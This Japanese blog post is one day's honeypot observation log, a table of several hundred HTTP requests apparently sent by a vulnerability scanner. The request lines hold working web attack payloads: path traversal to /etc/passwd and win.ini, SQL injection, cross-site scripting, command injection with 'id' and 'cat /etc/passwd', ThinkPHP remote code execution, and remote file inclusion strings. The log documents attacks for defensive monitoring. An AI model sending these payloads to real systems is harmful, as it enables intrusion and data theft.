コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/06/07 ハニーポット(仮) 観測記録 その4

ハニーポット(仮) 観測記録 2024/06/07分 その4です。

Location:US

リクエスト内容一覧

件数 Method Request Protocol
1 GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
1 GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
1 GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
1 GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
1 GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
1 GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
1 GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
2 GET /s_form.cgi HTTP/1.1
1 GET /sabin/SiteAdmin.htm HTTP/1.1
1 GET /sales/ HTTP/1.1
2 GET /samba/smb2www.pl HTTP/1.1
1 GET /saml/ HTTP/1.1
1 GET /sample/ HTTP/1.1
1 GET /samples/ HTTP/1.1
1 GET /samples/sample_posteddata.php HTTP/1.1
1 GET /samples/tomcat_proxy_directory_traversal.nasl1717627927 HTTP/1.1
1 GET /sane/ HTTP/1.1
1 GET /sane/save.php?file_save=/etc/passwd HTTP/1.1
1 GET /sapmc/sapmc.html HTTP/1.1
1 GET /save.php?file_save=/etc/passwd HTTP/1.1
1 GET /save/ HTTP/1.1
1 GET /sawmill6cl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /sawmillcl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /sbbs/ HTTP/1.1
1 GET /sbbs/index.php HTTP/1.1
1 GET /sblog/ HTTP/1.1
1 GET /sblog/search.php HTTP/1.1
1 GET /sc3/console.php?psid=101 HTTP/1.1
1 GET /scan/ HTTP/1.1
1 GET /scan/save.php?file_save=/etc/passwd HTTP/1.1
1 GET /scgi-bin/platform.cgi HTTP/1.1
1 GET /schedule/ HTTP/1.1
1 GET /schedule/event_view.php?eid=34%20UNION%20SELECT%20904176979 HTTP/1.1
1 GET /schedule/roschedule.php HTTP/1.1
1 GET /scheduleit/roschedule.php HTTP/1.1
1 GET /scheduler/roschedule.php HTTP/1.1
1 GET /scmadmin/LocalIndex.html HTTP/1.1
1 GET /scmadmin/ HTTP/1.1
1 GET /scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
1 GET /scribe/ HTTP/1.1
1 GET /scribe/login.php HTTP/1.1
1 GET /script/ HTTP/1.1
1 GET /script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E HTTP/1.1
1 GET /scripts/!pwds.txt HTTP/1.1
1 GET /scripts/%2f/admin.html HTTP/1.1
1 GET /scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
1 GET /scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
1 GET /scripts/.bash_history HTTP/1.1
1 GET /scripts//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts//home[.]html?0 HTTP/1.1
1 GET /scripts//plugins/db/mysql/mysql.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/authorize_aim/authorize_aim.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/beanstream/beanstream.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/cdg/cdg.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/compuworld/compuworld.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/directone/directone.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/echo/config.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/efsnet/efsnet.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/eway/eway.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/linkpoint/linkpoint.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/logiccommerce/logiccommerce.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/netbilling/netbilling.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/payflow_pro/payflow_pro.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/paymentsgateway/paymentsgateway.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/payos/payos.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/payready/payready.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/plugnplay/plugnplay.inc.php HTTP/1.1
1 GET /scripts//plugins/payment/theinternetcommerce/theinternetcommerce.inc.php HTTP/1.1
1 GET /scripts/1717627705-ror_session_fixation.nasl HTTP/1.1
2 GET /scripts/500page.jsp HTTP/1.1
1 GET /scripts/5n3yrimx.asp?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.asp?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.aspx?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.aspx?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.cfc?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.cfc?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.cfm?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.cfm?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.cgi?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.cgi?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.dll?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.dll?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.do?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.do?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.exe?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.exe?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.fts?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.fts?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.htm?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.htm?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.html?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.html?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.idc?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.idc?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.jsp?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.jsp?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.jspa?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.jspa?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.kspx?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.kspx?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.mscgi?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.mscgi?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.nsf?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.nsf?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.php3?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.php3?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.php?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.php?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.pl?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.pl?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/5n3yrimx.x?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/5n3yrimx.x?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /scripts/83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /scripts/83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.asp HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.aspx HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cfc HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cfm HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cgi HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.dll HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.do HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.exe HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.fts HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.htm HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.html HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.idc HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.jsp HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.jspa HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.kspx HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.mscgi HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.nsf HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.php3 HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.php HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.pl HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.x HTTP/1.1
1 GET /scripts/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.asp HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.aspx HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.cfc HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.cfm HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.cgi HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.dll HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.do HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.exe HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.fts HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.htm HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.html HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.idc HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.jsp HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.jspa HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.kspx HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.mscgi HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.nsf HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.php3 HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.php HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.pl HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script>.x HTTP/1.1
1 GET /scripts/<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /scripts/?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /scripts/?Mode=debug HTTP/1.1
1 GET /scripts/?cmd=Config HTTP/1.1
1 GET /scripts/?mod=read&id=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/?p=subscribe HTTP/1.1
1 GET /scripts/?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpadmin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /scripts/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpindex/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /scripts/?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.phpindex/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /scripts/?showimage=%27%29%20UNION%20SELECT%20%27pixelpost_15rc1.nasl-1717627936.jpg%27%20as%20id%2c%201947948844%20as%20headline%2c%20471440650%20as%20datetime%2c%201124930537%20as%20body%2c%201285236322%20as%20category%2c%201183223926%20as%20image-- HTTP/1.1
1 GET /scripts/?title=Special:Recentchanges&feed=atom HTTP/1.1
1 GET /scripts/?user=jffnms_user_sql_injection.nasl%27%20UNION%20SELECT%202%2c%27admin%27%2c%27%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.%27%2c%27Administrator%27--&file=index&pass= HTTP/1.1
1 GET /scripts/About/frmAbout.aspx HTTP/1.1
1 GET /scripts/Admin.php HTTP/1.1
1 GET /scripts/BrowserWeb/portal/portalbanner.htm HTTP/1.1
1 GET /scripts/CFIDE/probe.cfm HTTP/1.1
1 GET /scripts/CHANGELOG.md HTTP/1.1
1 GET /scripts/CategoryView.aspx?category=nessus HTTP/1.1
1 GET /scripts/ChangeLog HTTP/1.1
1 GET /scripts/Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
1 GET /scripts/Count.cgi?align=topcenter HTTP/1.1
1 GET /scripts/Edit.jsp?Page=Main HTTP/1.1
1 GET /scripts/Edit.jsp?page=User&editor=../../../Install HTTP/1.1
1 GET /scripts/GTcatalog/index.php?function=custom&custom=http[:]//example[.]com/1 HTTP/1.1
1 GET /scripts/GTcatalog/password.inc HTTP/1.1
1 GET /scripts/Nessus404/index.php HTTP/1.1
1 GET /scripts/PJreview_Neo.cgi?p=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/README.TXT HTTP/1.1
1 GET /scripts/RELEASE-NOTES HTTP/1.1
1 GET /scripts/SLwebmail/ShowLogin.dll?Language=fr HTTP/1.1
1 GET /scripts/SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1717627929%2c4%2c5 HTTP/1.1
1 GET /scripts/Security/login HTTP/1.1
1 GET /scripts/ServerView/SnmpView/SnmpListMibValues?SSL=&Server=34.68.118.83&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1 HTTP/1.1
1 GET /scripts/SystemInfo HTTP/1.1
1 GET /scripts/UI/Login?user=nessus-1717627781 HTTP/1.1
1 GET /scripts/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /scripts/WihPhoto/start.php HTTP/1.1
1 GET /scripts/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/YaBB.pl HTTP/1.1
1 GET /scripts/_admin/ HTTP/1.1
1 GET /scripts/_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
36 GET /scripts/ HTTP/1.1
1 GET /scripts/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/a1stats/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/about.php HTTP/1.1
1 GET /scripts/about/default_content.asp HTTP/1.1
1 GET /scripts/about HTTP/1.1
1 GET /scripts/account/?action=Login HTTP/1.1
1 GET /scripts/account/login.php HTTP/1.1
1 GET /scripts/acegilogin.jsp HTTP/1.1
1 GET /scripts/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/acp/index.php HTTP/1.1
1 GET /scripts/acp/lib/inserts.sql HTTP/1.1
1 GET /scripts/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/add.cgi HTTP/1.1
1 GET /scripts/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
1 GET /scripts/add_user.php HTTP/1.1
1 GET /scripts/addentry.php HTTP/1.1
1 GET /scripts/addschup HTTP/1.1
1 GET /scripts/adlayer.php?layerstyle=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/admin.php?action=viewpro&member=admin<script>x</script> HTTP/1.1
1 GET /scripts/admin.php?dpt=conf&sub=general HTTP/1.1
1 GET /scripts/admin.php?loggedin=1 HTTP/1.1
1 GET /scripts/admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/admin.php?zfaction=config HTTP/1.1
5 GET /scripts/admin.php HTTP/1.1
1 GET /scripts/admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
1 GET /scripts/admin/ HTTP/1.1
1 GET /scripts/admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/admin/admin.php?sid=' HTTP/1.1
1 GET /scripts/admin/admin.php?sid=0' HTTP/1.1
3 GET /scripts/admin/admin.php HTTP/1.1
1 GET /scripts/admin/backup.php HTTP/1.1
1 GET /scripts/admin/cal_login.php HTTP/1.1
1 GET /scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1717627950 HTTP/1.1
1 GET /scripts/admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/admin/connect.inc HTTP/1.1
1 GET /scripts/admin/define.inc.php?match=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd|| HTTP/1.1
1 GET /scripts/admin/index.html HTTP/1.1
1 GET /scripts/admin/index.php?act=login&username='%20UNION%20SELECT%201,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus HTTP/1.1
1 GET /scripts/admin/index.php?cmd=login HTTP/1.1
1 GET /scripts/admin/index.php?username=advanced_poll_var_overwrite.nasl&pollvars[poll_username]=advanced_poll_var_overwrite.nasl&password=914283891&pollvars[poll_password]=63eb0a4ee6682415138833f41cbce951 HTTP/1.1
1 GET /scripts/admin/ip_manage.php HTTP/1.1
1 GET /scripts/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
1 GET /scripts/admin/login-default.do HTTP/1.1
2 GET /scripts/admin/login.html HTTP/1.1
2 GET /scripts/admin/login.php HTTP/1.1
1 GET /scripts/admin/login/ HTTP/1.1
1 GET /scripts/admin/o12guest.mdb HTTP/1.1
1 GET /scripts/admin/objects.inc.php4?Server[path]=http[:]//example[.]com&Server[language_file]=nessus.php HTTP/1.1
1 GET /scripts/admin/operators.php?view HTTP/1.1
1 GET /scripts/admin/plog-admin-functions.php?config[basedir]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
1 GET /scripts/admin/setup.php HTTP/1.1
1 GET /scripts/admin/templates/header.php?admin_root=http[:]//example[.]com HTTP/1.1
1 GET /scripts/admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/admin/users.php HTTP/1.1
1 GET /scripts/admincp/login.php HTTP/1.1
2 GET /scripts/administrator/index.php HTTP/1.1
1 GET /scripts/administrator/manifests/files/joomla.xml HTTP/1.1
1 GET /scripts/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem%28id%29%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
1 GET /scripts/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /scripts/adxmlrpc.php HTTP/1.1
1 GET /scripts/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /scripts/agenda.php3 HTTP/1.1
1 GET /scripts/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%201758880185%2c2%2c235810029%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20-- HTTP/1.1
1 GET /scripts/al_initialize.php?alpath=/etc/passwd%00 HTTP/1.1
1 GET /scripts/album.pl?function=about HTTP/1.1
1 GET /scripts/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /scripts/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
1 GET /scripts/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1
1 GET /scripts/api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
1 GET /scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /scripts/artifactory/webapp/home.html?0 HTTP/1.1
1 GET /scripts/artifactory/webapp HTTP/1.1
1 GET /scripts/ashnews.php?pathtoashnews=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/athenareg.php?pass=%20;id HTTP/1.1
1 GET /scripts/atmail.pl HTTP/1.1
1 GET /scripts/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/awstats.cgi HTTP/1.1
1 GET /scripts/awstats.pl HTTP/1.1
1 GET /scripts/awstatstotals.php?sort=\"].passthru('id').exit().%24a[\" HTTP/1.1
1 GET /scripts/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\" HTTP/1.1
1 GET /scripts/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
1 GET /scripts/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
1 GET /scripts/axis2-web/index.jsp HTTP/1.1
1 GET /scripts/b2-tools/gm-2-b2.php?b2inc=http[:]//example[.]com HTTP/1.1
1 GET /scripts/backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
1 GET /scripts/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script> HTTP/1.1
1 GET /scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1717627963')</script> HTTP/1.1
2 GET /scripts/base_main.php HTTP/1.1
2 GET /scripts/base_maintenance.php HTTP/1.1
1 GET /scripts/base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/basilix.php HTTP/1.1
1 GET /scripts/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1
1 GET /scripts/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1
1 GET /scripts/bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
1 GET /scripts/bblog/index.php HTTP/1.1
1 GET /scripts/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
1 GET /scripts/billing/billingmanager_income.asp HTTP/1.1
1 GET /scripts/bin/html2text.php HTTP/1.1
1 GET /scripts/bizmail.cgi HTTP/1.1
1 GET /scripts/biztalkhttpreceive.dll HTTP/1.1
